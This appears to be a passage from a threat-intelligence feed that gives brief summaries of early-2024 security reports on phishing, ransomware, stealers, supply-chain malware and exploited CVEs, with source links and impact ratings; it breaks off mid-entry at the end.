Intel Source:
Darktrace
Intel Name:
A_New_Phishing_Attack_Targeting_Dropbox
Date of Scan:
2024-03-11
Impact:
LOW
Summary:
Darktrace researchers have alerted users to a new phishing and malspam campaign that uses Dropbox emails to target users of well-known Software-as-a-Service (SaaS) platforms. According to recent research, a fresh phishing attempt targeting Dropbox has been effective in bypassing MFA (multi-factor authentication) safeguards. By tricking users into downloading malware, this attack seeks to obtain login credentials.
Source: https://darktrace.com/blog/legitimate-services-malicious-intentions-getting-the-drop-on-phishing-attacks-abusing-dropbox
2024-03-11
Spread_of_Malware_MSIX_Pretended_to_Be_Notion_Installer
LOW
+
Intel Source:
ASEC
Intel Name:
Spread_of_Malware_MSIX_Pretended_to_Be_Notion_Installer
Date of Scan:
2024-03-11
Impact:
LOW
Summary:
The Notion installer is actually a ruse to deliver MSIX malware. The distribution website resembles the official Notion homepage. When the user clicks the download button, a file called "Notion-x86.msix" is downloaded. This file, a Windows app installer, is signed with a legitimate certificate. When the user runs the file, an installation pop-up appears; clicking the Install button installs the malware on the computer along with Notion.
Source: https://asec.ahnlab.com/en/62815/
2024-03-11
Malicious_Campagin_Exploiting_Stored_XSS_in_Popup_Builder
LOW
+
Intel Source:
Sucuri
Intel Name:
Malicious_Campagin_Exploiting_Stored_XSS_in_Popup_Builder
Date of Scan:
2024-03-11
Impact:
LOW
Summary:
Attackers use a known vulnerability in the Popup Builder WordPress plugin to inject malicious code into the Custom JS or CSS section of the WordPress admin interface, which is stored internally in the wp_postmeta database table.
Source: https://blog.sucuri.net/2024/03/new-malware-campaign-found-exploiting-stored-xss-in-popup-builder-4-2-3.html?web_view=true
2024-03-11
The_TeamCity_Exploit_Leads_BianLian_to_Embrace_PowerShell
MEDIUM
+
Intel Source:
GuidePoint Security
Intel Name:
The_TeamCity_Exploit_Leads_BianLian_to_Embrace_PowerShell
Date of Scan:
2024-03-11
Impact:
MEDIUM
Summary:
Researchers at GuidePoint have discovered malicious activities on a client's network. After locating a weak point in the TeamCity server, the threat actor used CVE-2024-27198 / CVE-2023-42793 to gain initial access to the system. Within TeamCity, the threat actor created users and executed malicious commands using the service account associated with the TeamCity product.
Source: https://www.guidepointsecurity.com/blog/bianlian-gos-for-powershell-after-teamcity-exploitation/
2024-03-08
An_emerging_information_stealing_Project_trojan
LOW
+
Intel Source:
Inquest
Intel Name:
An_emerging_information_stealing_Project_trojan
Date of Scan:
2024-03-08
Impact:
LOW
Summary:
The article discusses the emergence of a new trojan called Planet Stealer, which is designed to steal sensitive information from victim hosts. It is written in Go and is being sold in underground forums. This type of information-stealing malware is in high demand among financially motivated criminals, indicating a thriving market for such tools.
Source: https://inquest.net/blog/around-we-go-planet-stealer-emerges/
2024-03-08
New_Fakext_Malware_Targeting_Latin_American_Banks
LOW
+
Intel Source:
Security Intelligence
Intel Name:
New_Fakext_Malware_Targeting_Latin_American_Banks
Date of Scan:
2024-03-08
Impact:
LOW
Summary:
IBM security researchers have discovered a new, widely distributed malware called Fakext which leverages a malicious Edge plugin to launch web-injection and man-in-the-browser attacks. Over 35,000 infected sessions have been seen by researchers since November 2023; the majority of these sessions originate from Latin America (LATAM), with a lesser proportion from North America and Europe.
Source: https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/
2024-03-08
Navigating_the_tax_season_global_surge
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Navigating_the_tax_season_global_surge
Date of Scan:
2024-03-08
Impact:
MEDIUM
Summary:
As tax deadlines approach globally, individuals and businesses must be vigilant against an increase in tax-related scams and ransomware attacks. Scammers exploit this period to launch sophisticated phishing campaigns, aiming to steal personal information, financial data, or directly extract money through deceit. Notably, the collaboration between ransomware groups GhostSec and Stormous has marked a significant rise in ransomware threats, including the deployment of the STMX_GhostLocker ransomware-as-a-service.
Source: https://blog.talosintelligence.com/threat-source-newsletter-march-7-2024/
2024-03-08
Compromised_Supply_Chain_and_Sophisticated_Toolkit_Exposed
LOW
+
Intel Source:
ESET
Intel Name:
Compromised_Supply_Chain_and_Sophisticated_Toolkit_Exposed
Date of Scan:
2024-03-08
Impact:
LOW
Summary:
ESET researchers identified a cyberespionage campaign directed at Tibetans across various regions. The threat actors deployed downloaders, droppers, and backdoors, such as the exclusive MgBot and the recently added Nightdoor, targeting networks in East Asia. Additionally, the attackers compromised the supply chain of a Tibetan language translation app developer.
Source: https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/
2024-03-08
Magnet_Goblin_Uses_1_Day_Vulnerabilities_to_Target_Publicly_Facing_Servers
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Magnet_Goblin_Uses_1_Day_Vulnerabilities_to_Target_Publicly_Facing_Servers
Date of Scan:
2024-03-08
Impact:
MEDIUM
Summary:
A financially driven threat actor, Magnet Goblin swiftly embraces and makes use of one-day vulnerabilities in services that are accessible to the public as a means of spreading infection. In one instance using Ivanti Connect Secure VPN (CVE-2024-21887), the exploit was added to the group's toolkit in less than a day following the publication of a proof of concept.
Source: https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/
2024-03-07
Beware_of_Malware_Delivering_Spoofing_Websites
LOW
+
Intel Source:
Zscaler
Intel Name:
Beware_of_Malware_Delivering_Spoofing_Websites
Date of Scan:
2024-03-07
Impact:
LOW
Summary:
Researchers at Zscaler have identified a threat actor that creates fake websites for Zoom, Google Meet, and Skype in order to distribute malware. The threat actor infects Windows users with NjRAT and DCRat and distributes SpyNote RAT to Android users. By using shared web hosting, the attacker was able to host all of these fake online meeting sites under a single IP address. As seen in all of the figures below, the fake websites were all in Russian. Furthermore, the attackers hosted these fake sites on URLs that closely matched those of the real websites.
Source: https://www.zscaler.com/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures
2024-03-06
Examining_Infrastructure_That_8Base_Using_in_Relation_to_Phobos_Ransomware
MEDIUM
+
Intel Source:
Intel-Ops
Intel Name:
Examining_Infrastructure_That_8Base_Using_in_Relation_to_Phobos_Ransomware
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
Intel-Ops is actively monitoring infrastructure that has been determined to be part of the 8Base ransomware group, which operates the Phobos ransomware. A dispersed group of affiliates with very similar TTPs, along with several variants (Eking, Eight, Elbie, Devos, and Faust), suggest that Phobos operates as a Ransomware-as-a-Service (RaaS).
Source: https://medium.com/@Intel_Ops/phobos-ransomware-analysing-associated-infrastructure-used-by-8base-646560302a8d
2024-03-06
The_Spinning_Yarn_Linux_Malware_Campaign_Targeting_Misconfigured_Servers
MEDIUM
+
Intel Source:
Cado Security
Intel Name:
The_Spinning_Yarn_Linux_Malware_Campaign_Targeting_Misconfigured_Servers
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
Researchers at Cado Security Labs have discovered a new malware campaign that targets misconfigured servers that host web-facing services including Redis, Docker, Apache Hadoop YARN, and Confluence. The campaign makes use of several distinct and unreported payloads, such as four Golang binaries, which are instruments for automatically locating and infecting sites that are hosting the aforementioned services. By utilizing common misconfigurations and an n-day vulnerability, the attackers use these tools to generate exploit code that allows them to conduct Remote Code Execution (RCE) attacks and infect new hosts.
Source: https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
2024-03-06
The_fake_video_connected_to_Russian_cyberscam_network
MEDIUM
+
Intel Source:
Qurium
Intel Name:
The_fake_video_connected_to_Russian_cyberscam_network
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
A deep fake video of Maria Ressa promoting a crypto-currency scam was released in early February 2024. The video was hosted on a domain that contained links to a Russian cyberscam network. Metadata analysis revealed Russian influence behind the creation of the deep fake and fake news articles designed to discredit Ressa.
Source: https://www.qurium.org/alerts/philippines/deep-fake-video-of-maria-ressa-connected-to-cyberscam-network-in-russia/
2024-03-06
New_Lighter_Ransomware_Targeting_Individuals_in_UK_and_US
MEDIUM
+
Intel Source:
Cyfirma Research
Intel Name:
New_Lighter_Ransomware_Targeting_Individuals_in_UK_and_US
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
Researchers at Cyfirma have identified a brand-new malware developed by the Lighter Extortion group, which they have named Lighter malware. It is an uncommon instance of triple extortion, in which the threat actors, in addition to encrypting and exfiltrating the data, make threats against the victim if the ransom is not paid. Based on the ransom note, the threat actors are likely to target individuals in the US and the UK.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_our-researcher-kaush%C3%ADk-pa%C5%82-discovered-a-new-activity-7171078602367594496-4w2G?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-03-06
TA4903_Using_Phishing_Attack_on_US_Government_and_Small_Businesses
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
TA4903_Using_Phishing_Attack_on_US_Government_and_Small_Businesses
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have noticed a rise in credential phishing and fraud campaigns from TA4903 between mid-2023 and early 2024 that use new themes. The actor began spoofing small and medium-sized businesses (SMBs) across a range of sectors, including manufacturing, energy, finance, food and beverage, and construction. Proofpoint also reports an increase in BEC themes, with lures such as "cyberattacks" being used to entice victims to divulge their banking and payment information.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta4903-actor-spoofs-us-government-small-businesses-phishing-bec-bids
2024-03-06
Attackers_still_abusing_Terminator_tool_and_variants
MEDIUM
+
Intel Source:
Sophos, GitHub
Intel Name:
Attackers_still_abusing_Terminator_tool_and_variants
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
A threat intelligence report describes how threat actors continue to leverage vulnerable drivers like Zemana Anti-Logger and Anti-Malware to disable security products through Bring Your Own Vulnerable Driver (BYOVD) attacks. Variants of the Terminator tool that exploit these drivers are still observed in the wild. The actors use the drivers for lateral movement and privilege escalation as part of ransomware campaigns targeting healthcare and other industries.
Source: https://news.sophos.com/en-us/2024/03/04/itll-be-back-attackers-still-abusing-terminator-tool-and-variants/ https://github.com/sophoslabs/IoCs/blob/master/Zemana-driver-IoCs.csv
2024-03-06
A_Thorough_Examination_of_I_SOONs_Commercial_Offering
LOW
+
Intel Source:
Harfanglab
Intel Name:
A_Thorough_Examination_of_I_SOONs_Commercial_Offering
Date of Scan:
2024-03-06
Impact:
LOW
Summary:
I-Soon's business proposal indicates that processing the gathered data, rather than failing to reach targets in the first place, is the primary problem. Their products classify and sort stolen documents with the aid of deep learning. The business seems to have difficulty sourcing malware and usually relies on rudimentary techniques (phishing, for example). Nevertheless, over the last ten years they have compromised numerous strategic targets all around the world.
Source: https://harfanglab.io/en/insidethelab/isoon-leak-analysis/
2024-03-06
The_DDoSia_Project_of_NoName057_16
LOW
+
Intel Source:
Sekoia
Intel Name:
The_DDoSia_Project_of_NoName057_16
Date of Scan:
2024-03-06
Impact:
LOW
Summary:
Since the start of the conflict in Ukraine, a number of organizations dubbed "nationalist hacktivists" have surfaced, mostly on the Russian side, to fuel hostilities between Moscow and Kyiv. Of these organizations, the pro-Russian group NoName057(16) has gained notoriety for starting Project DDoSia, a group effort to launch massive distributed denial-of-service (DDoS) attacks against organizations (private companies, government agencies, and state institutions) that are part of nations that back Ukraine, primarily NATO members.
Source: https://blog.sekoia.io/noname05716-ddosia-project-2024-updates-and-behavioural-shifts
2024-03-06
Diving_Deep_into_Earth_Kapre_Group
LOW
+
Intel Source:
Trend Micro
Intel Name:
Diving_Deep_into_Earth_Kapre_Group
Date of Scan:
2024-03-06
Impact:
LOW
Summary:
Researchers at Trend Micro have investigated Earth Kapre, also known as RedCurl and Red Wolf. The investigation revealed the intrusion set Earth Kapre used in a recent incident and showed how the team used threat intelligence to link the extracted evidence to this cyberespionage group.
Source: https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html
2024-03-06
Distributed_WordPress_Brute_Force_Attack
MEDIUM
+
Intel Source:
Sucuri
Intel Name:
Distributed_WordPress_Brute_Force_Attack
Date of Scan:
2024-03-06
Impact:
MEDIUM
Summary:
The article discusses a recent attack on WordPress websites, where infected websites are used to launch a distributed brute force attack to guess passwords for other third-party sites. The attackers then visit the target sites to download valid credentials. The article provides statistics and tips for mitigating the risk of such attacks, as well as a new development in website hacks involving Web3 crypto wallet drainers. It also explains the process of uploading encrypted credentials and the different stages of the attack. The article concludes by offering assistance for those who believe their website may be infected.
Source: https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html
2024-03-06
WebLogic_Server_Exploited_by_z0Miner
LOW
+
Intel Source:
ASEC
Intel Name:
WebLogic_Server_Exploited_by_z0Miner
Date of Scan:
2024-03-06
Impact:
LOW
Summary:
Researchers from ASEC have discovered multiple instances of threat actors targeting vulnerable Korean servers. The report describes a recent incident involving an attack against Korean WebLogic servers by the threat actor "z0Miner."
Source: https://asec.ahnlab.com/en/62564/
2024-03-05
An_Extremely_Harmful_Malware_WinDestroyer
LOW
+
Intel Source:
Cyfirma Research
Intel Name:
An_Extremely_Harmful_Malware_WinDestroyer
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered WinDestroyer, a highly destructive malware. The ransomware does not demand a ransom, indicating that it is not financially motivated. This advanced threat uses sophisticated tactics to render systems unusable, including lateral movement capabilities, API hammering, and DLL reload attacks.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_windestroyer-and-its-origin-activity-7170733140540346368-Rmvc?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-03-05
CHAVECLOAKS_Targeting_Brazilians_via_Malicious_PDFs
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
CHAVECLOAKS_Targeting_Brazilians_via_Malicious_PDFs
Date of Scan:
2024-03-05
Impact:
MEDIUM
Summary:
Fortinet researchers have found CHAVECLOAK, a high-severity Trojan that targets Brazilian bank customers. The malware targets Windows devices and gains access to online banking services, stealing financial data and banking credentials.
Source: https://www.fortinet.com/blog/threat-research/banking-trojan-chavecloak-targets-brazil
2024-03-05
A_novel_backdoor_GTPDOOR
LOW
+
Intel Source:
Double Agent
Intel Name:
A_novel_backdoor_GTPDOOR
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
GTPDOOR is Linux malware that communicates C2 traffic over GTP-C signaling messages, blending in with normal telco traffic. It can execute commands sent in GTP echo requests and probe hosts covertly via TCP packets. Versions target x86 and i386 architectures.
Source: https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR
2024-03-05
New_variant_of_SupermanMiner_mining_malware
LOW
+
Intel Source:
Cert.360
Intel Name:
New_variant_of_SupermanMiner_mining_malware
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
A new variant of the SupermanMiner cryptocurrency mining malware has been active for over 2 years, using techniques like vulnerability exploitation, SSH brute force, web shell injection and others to infect systems. It has evolved into multiple new branches, with heavy obfuscation and complex persistence mechanisms, posing a serious threat. Users should apply security patches, use strong passwords, and limit external access to prevent infection.
Source: https://cert.360.cn/warning/detail?id=65deee7fc09f255b91b17e0f
2024-03-05
The_security_threats_from_malicious_machine_learning_models
LOW
+
Intel Source:
NS Focus Global
Intel Name:
The_security_threats_from_malicious_machine_learning_models
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
The article discusses the potential security threats posed by malicious machine learning (ML) models on the Hugging Face platform. It provides background information on a recent report that found some ML models on Hugging Face may be used to attack the user environment, leading to code execution and providing attackers with full control of the infected machine. The affected models, specifically the baller423/goober2 model, are discussed in detail, along with a technical analysis of how they work and how they can be loaded and executed. The article also highlights the potential risks associated with PyTorch and Tensorflow models. It concludes with mitigation methods, such as using Hugging Face's new format Safetensors and implementing security measures like malware and Pickle scanning. The article emphasizes the importance of thorough scrutiny and safety measures when dealing with ML models from untrusted sources and the urgency of AI model security.
Source: https://nsfocusglobal.com/ai-supply-chain-security-hugging-face-malicious-ml-models/
2024-03-05
A_surge_of_new_GhostLocker_2_ransomware_by_GhostSec_threat_group
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
A_surge_of_new_GhostLocker_2_ransomware_by_GhostSec_threat_group
Date of Scan:
2024-03-05
Impact:
MEDIUM
Summary:
The article discusses the evolution and joint operation of GhostSec and Stormous, two hacking groups that have collaborated to conduct double extortion attacks using the GhostLocker and StormousX ransomware programs. It provides details on the various versions of GhostLocker, its C2 panels, and the features provided to affiliates. The article also mentions two new tools in GhostSec's arsenal, the GhostSec Deep Scan toolset and GhostPresser, which are used for scanning and attacking legitimate websites. It discusses the groups' focus on raising funds for hacktivists and threat actors and their new ransomware-as-a-service program. The article also provides information on the capabilities of GhostPresser, a tool used to target WordPress websites, and how Cisco Secure Endpoint and other Cisco products can prevent the execution of this malware. It also includes a list of indicators associated with this threat.
Source: https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/
2024-03-05
WogRAT_Malware_Exploiting_aNotepad
LOW
+
Intel Source:
ASEC
Intel Name:
WogRAT_Malware_Exploiting_aNotepad
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
Researchers from ASEC have found that backdoor malware is distributed using the free online notepad tool aNotepad. Both the PE format, which targets Windows systems, and the ELF format, which targets Linux systems, are supported by said malware. The malware is categorized as WogRAT since the threat actor uses the string "WingOfGod" when creating it.
Source: https://asec.ahnlab.com/en/62446/
2024-03-05
Remcos_RAT_and_Agent_Tesla_Deployed_by_Stego_Campaign
LOW
+
Intel Source:
Cyfirma
Intel Name:
Remcos_RAT_and_Agent_Tesla_Deployed_by_Stego_Campaign
Date of Scan:
2024-03-05
Impact:
LOW
Summary:
Researchers at Cyfirma have discovered a campaign that uses template injection in a Microsoft Office document to bypass standard email security safeguards. Opening the document initiates a multi-stage attack that includes the download and execution of scripts and the deployment of the malware known as "Agent Tesla" and the Remcos Remote Access Trojan (RAT).
Source: https://www.cyfirma.com/outofband/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/
2024-03-04
A_Multistage_Ransomware_Attack_Using_RA_World
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
A_Multistage_Ransomware_Attack_Using_RA_World
Date of Scan:
2024-03-04
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered a multi-stage attack known as RA World, which is aimed against multiple healthcare organizations in the Latin American region. The attack's goal is to maximize the group's operational impact and success.
Source: https://www.trendmicro.com/en_us/research/24/c/multistage-ra-world-ransomware.html
2024-03-04
TA577_Cyber_Threat_Unmasked
LOW
+
Intel Source:
Proofpoint
Intel Name:
TA577_Cyber_Threat_Unmasked
Date of Scan:
2024-03-04
Impact:
LOW
Summary:
Proofpoint researchers uncovered a new attack chain by the cyber threat actor TA577, focused on the uncommon theft of NT LAN Manager (NTLM) authentication information. Two campaigns were detected on 26 and 27 February 2024, targeting hundreds of global organizations through thread hijacking with zipped HTML attachments.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft
2024-03-04
A_recent_Copybara_fraud_campaign
LOW
+
Intel Source:
Cleafy
Intel Name:
A_recent_Copybara_fraud_campaign
Date of Scan:
2024-03-04
Impact:
LOW
Summary:
The article discusses the rising threat of On-Device Fraud (ODF) in the banking sector, which involves fraudulent activities initiated directly on the victim's device. It focuses on a recent Copybara fraud campaign and explains the use of remote control capabilities by malware to execute ODF scenarios. The article also provides an overview of phishing panels and the Copybara botnet's associated C2 web panel. It describes the functionalities of the panel, including the ability to remotely control infected devices, steal credentials, and send fake push notifications. The article concludes by emphasizing the need for collaboration and innovation in combating ODF and other forms of banking fraud.
Source: https://www.cleafy.com/cleafy-labs/on-device-fraud-on-the-rise-exposing-a-recent-copybara-fraud-campaign
2024-03-04
Advanced_Phishing_Kit_Targeting_Cryptocurrency_Platforms_and_FCC
LOW
+
Intel Source:
Lookout
Intel Name:
Advanced_Phishing_Kit_Targeting_Cryptocurrency_Platforms_and_FCC
Date of Scan:
2024-03-04
Impact:
LOW
Summary:
Lookout researchers have identified an innovative phishing kit employing unique strategies to target both cryptocurrency platforms and the Federal Communications Commission (FCC) through mobile devices. Modeled after the techniques used by groups like Scattered Spider, this kit allows attackers to replicate single sign-on (SSO) pages. Subsequently, they employ a blend of email, SMS, and voice phishing to deceive targets into divulging usernames, passwords, password reset URLs, and even photo IDs from numerous victims, predominantly in the United States.
Source: https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit
2024-03-04
New_Wave_of_SocGholish_Infections
LOW
+
Intel Source:
Sucuri
Intel Name:
New_Wave_of_SocGholish_Infections
Date of Scan:
2024-03-04
Impact:
LOW
Summary:
The article discusses a new wave of SocGholish malware infections that are targeting WordPress websites. These malicious plugins are being uploaded to compromised websites and contain code that injects SocGholish payloads onto the site. The article provides examples of different plugins that have been modified to include this code and explains how the code is executed. It also mentions the TDS domains that are being used to host the SocGholish scripts and the recent registration dates of these domains. The article emphasizes the responsibility of website owners to keep their websites secure and provides tips for website owners to prevent the distribution of malware. It also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article also discusses the similarities between criminal organizations behind cyber attacks and regular IT companies. It highlights the importance of website visitors being vigilant and avoiding clicking on suspicious links. The article concludes by emphasizing the importance of protecting websites from these types of attacks and provides information on the techniques used by attackers, such as "domain shadowing" and gaining access through compromised credentials.
Source: https://blog.sucuri.net/2024/03/new-wave-of-socgholish-infections-impersonates-wordpress-plugins.html
2024-03-04
The_use_of_spyware_Predator_poses_significant_risks
LOW
+
Intel Source:
Recorded Future
Intel Name:
The_use_of_spyware_Predator_poses_significant_risks
Date of Scan:
2024-03-04
Impact:
LOW
Summary:
Recorded Future's Insikt Group has observed new activity related to the operators of Predator, a mercenary mobile spyware. Spyware like Predator poses significant privacy, legality, and physical safety risks, especially when used outside serious crime and counterterrorism contexts. The Insikt Group's research uncovered a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data.
Source: https://www.recordedfuture.com/predator-spyware-operators-rebuild-multi-tier-infrastructure-target-mobile-devices
2024-03-01
The_spread_of_Bladeroid_crypto_stealer_thru_npm_packages
LOW
+
Intel Source:
Sonatype
Intel Name:
The_spread_of_Bladeroid_crypto_stealer_thru_npm_packages
Date of Scan:
2024-03-01
Impact:
LOW
Summary:
Sonatype has identified multiple open source packages, named sniperv1 and sniperv2 among others, that infect npm developers with a Windows info-stealer and crypto-stealer called 'Bladeroid.' The info-stealer can be seen peeking into a user's browser cookies and local storage data and attempting to steal saved (auto-fill) form data.
Source: https://blog.sonatype.com/npm-packages-caught-spreading-bladeroid-info-stealer
2024-03-01
The_DarkGate_Model_For_Malware_Delivery_and_Persistence
LOW
+
Intel Source:
ISC.SANS
Intel Name:
The_DarkGate_Model_For_Malware_Delivery_and_Persistence
Date of Scan:
2024-03-01
Impact:
LOW
Summary:
ISC.SANS researchers have examined a typical phishing PDF, which resulted in the delivery of a far more dubious MSI signed with a legitimate code signing certificate and having an unexpectedly low signature-based detection rate on VirusTotal because of the utilization of multiple layered stages.
Source: https://isc.sans.edu/diary/rss/30700
2024-03-01
Active_Exploitation_of_Ivanti_Gateway_Vulnerabilities
MEDIUM
+
Intel Source:
CISA
Intel Name:
Active_Exploitation_of_Ivanti_Gateway_Vulnerabilities
Date of Scan:
2024-03-01
Impact:
MEDIUM
Summary:
According to a new cybersecurity advisory from the Five Eyes intelligence alliance, the Integrity Checker Tool (ICT) can be tricked into giving a false sense of security. Cyber threat actors are exploiting known vulnerabilities in the Ivanti Connect Secure and Ivanti Policy Secure gateways. Even after factory resets, a cyber threat actor may still be able to retain root-level persistence, and Ivanti's ICT is insufficient to detect compromise. Since January 10, 2024, Ivanti has published five security flaws affecting their products. Of those, four are now being actively exploited by various threat actors to spread malware.
Source: https://www.cisa.gov/sites/default/files/2024-02/AA24-060B-Threat-Actors-Exploit-Multiple-Vulnerabilities-in-Ivanti-Connect-Secure-and-Policy-Secure-Gateways_0.pdf
2024-03-01
Airbnb_scam
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Airbnb_scam
Date of Scan:
2024-03-01
Impact:
LOW
Summary:
The scammers send people emails that claim to be from Tripadvisor with some links, but more alarm bells were triggered when the sender email showed up as support@mailerfx.com, not exactly the email address you’d expect from Tripadvisor itself. The scammer hoped people would click on the booking button on the fake Tripadvisor site. If they had done so, they would have seen a prompt to register with ‘Tripadvisor’.
Source: https://www.malwarebytes.com/blog/news/2024/02/airbnb-scam-sends-you-to-a-fake-tripadvisor-site-takes-your-money
2024-03-01
Exploring_Confluence_CVE_2022_26134
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Exploring_Confluence_CVE_2022_26134
Date of Scan:
2024-03-01
Impact:
LOW
Summary:
Researchers from ISC SANS have added daemonlogger to capture packets and Arkime to view the packets that their DShield sensor captured. They noticed that, so far, this activity had only targeted TCP/8090 and that the requests contain base64-encoded URLs. On February 12, 2024, the DShield sensor began recording this behavior as it came in from different IPs in different locations.
Source: https://isc.sans.edu/diary/Scanning+for+Confluence+CVE202226134/30704/
2024-03-01
Bifrost_New_Tactics_of_Domain_Deception
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Bifrost_New_Tactics_of_Domain_Deception
Date of Scan:
2024-03-01
Impact:
MEDIUM
Summary:
Researchers from Palo Alto have discovered a novel Linux version of Bifrost, also known as Bifrose, which demonstrates a creative way to avoid discovery. It makes use of a phony domain that imitates the official VMware domain. The goal of the most recent version of Bifrost is to sneak past security safeguards and infiltrate specific systems.
Source: https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/
2024-03-01
North_Korean_threat_actors_attacking_developers_with_suspicious_npm_packages
LOW
+
Intel Source:
The Hackers news, Phylum
Intel Name:
North_Korean_threat_actors_attacking_developers_with_suspicious_npm_packages
Date of Scan:
2024-03-01
Impact:
LOW
Summary:
Phylum in their blog explained in detail an npm package posing as a code profiler that installs several malicious scripts, including a cryptocurrency and credential stealer. The attacker tried to hide the malicious code in a test file.
Source: https://thehackernews.com/2024/02/north-korean-hackers-targeting.html https://blog.phylum.io/smuggling-malware-in-test-code/
2024-02-29
Spread_Mac_Malware_thru_Calendar_Meeting_Links
LOW
+
Intel Source:
Krebsonsecurity
Intel Name:
Spread_Mac_Malware_thru_Calendar_Meeting_Links
Date of Scan:
2024-02-29
Impact:
LOW
Summary:
Malicious hackers are targeting people in the cryptocurrency industry in attacks that start with a link added to the target’s calendar at Calendly, an application for scheduling appointments and meetings. The attackers impersonated established cryptocurrency investors and asked to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.
Source: https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/
2024-02-29
The_Lazarus_group_targets_blockchain_community
MEDIUM
+
Intel Source:
Hunt
Intel Name:
The_Lazarus_group_targets_blockchain_community
Date of Scan:
2024-02-29
Impact:
MEDIUM
Summary:
Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor.
Source: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram
2024-02-29
The_Phobos_ransomware_variants
MEDIUM
+
Intel Source:
CISA
Intel Name:
The_Phobos_ransomware_variants
Date of Scan:
2024-02-29
Impact:
MEDIUM
Summary:
The FBI, CISA, and MS-ISAC are releasing this joint CSA to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
2024-02-29
The_Escalation_of_Web_API_Cyber_Attacks_this_year
LOW
+
Intel Source:
Checkpoint
Intel Name:
The_Escalation_of_Web_API_Cyber_Attacks_this_year
Date of Scan:
2024-02-29
Impact:
LOW
Summary:
The landscape of cyber security is continuously evolving, with Web Application Programming Interfaces (APIs) becoming a focal point for cyber attackers. APIs, which facilitate communication between different software applications, present a broader attack surface than traditional web applications. This exposure is due to the inherent vulnerabilities within Web APIs that can lead to authentication bypasses, unauthorized data access, and a range of malicious activities.
Source: https://blog.checkpoint.com/research/a-shadowed-menace-the-escalation-of-web-api-cyber-attacks-in-2024/
2024-02-29
SPIKEDWINE_With_WINELOADER_Targets_European_Diplomats
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
SPIKEDWINE_With_WINELOADER_Targets_European_Diplomats
Date of Scan:
2024-02-29
Impact:
MEDIUM
Summary:
Researchers at Zscaler have found a suspicious PDF file that was posted to VirusTotal on January 30, 2024, from Latvia. Disguised as a letter from the Indian ambassador, this PDF file invites ambassadors to a wine tasting in February 2024. Additionally, the PDF contained a link to a fictitious questionnaire that starts the infection chain by sending users to a malicious ZIP archive housed on a compromised website. They found another similar PDF file uploaded to VirusTotal from Latvia in July 2023 after conducting additional threat research.
Source: https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
2024-02-29
Affiliate_TTPs_For_BlackCat_Ransomware
HIGH
+
Intel Source:
Hunter
Intel Name:
Affiliate_TTPs_For_BlackCat_Ransomware
Date of Scan:
2024-02-29
Impact:
HIGH
Summary:
In less than three minutes, the threat actor was able to download a copy of the ransomware executable to the endpoint through the second identified ScreenConnect instance. In response to the file being quarantined, the threat actor temporarily disabled Windows Defender before downloading the executable file once more and successfully launching it.
Source: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
2024-02-29
GUloader_Encryption_Strategies_Unmasked
LOW
+
Intel Source:
